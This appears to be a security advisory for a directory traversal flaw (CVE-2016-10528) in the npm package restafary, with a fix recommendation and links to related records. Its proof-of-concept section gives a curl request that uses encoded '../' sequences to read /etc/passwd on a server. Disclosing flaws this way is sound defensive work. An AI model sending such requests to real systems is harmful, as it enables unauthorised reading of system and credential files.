Lucene search
Craig ArendtNODEJS:89HistoryMar 25, 2016 - 5:56 p.m.
Directory Traversal
2016-03-2517:56:35
Craig Arendt
www.npmjs.com
20
0.001 Low
EPSS
Percentile
36.4%
Overview
Affected versions of restafary are susceptible to a directory traversal vulnerability when a root path is specified in the configuration.
Proof of Concept
curl -i -s -k -X 'GET' -H 'Authorization: Basic YWRtaW46cGFzc3dvcmQ=' 'http://localhost:8000/api/v1/fs/..%2f..%2fetc/passwd'
Recommendation
Update to version 1.6.1 or later.
References
Related
cvelist
cvelist
CVE-2016-10528
2018-04-26 00:00:00
cve
cve
CVE-2016-10528
2018-05-31 20:29:00
osv
osv
CVE-2016-10528
2018-05-31 20:29:00
Directory Traversal in restafary
2019-02-18 23:39:22
nvd
nvd
CVE-2016-10528
2018-05-31 20:29:00
github
github
Directory Traversal in restafary
2019-02-18 23:39:22
prion
prion
Path traversal
2018-05-31 20:29:00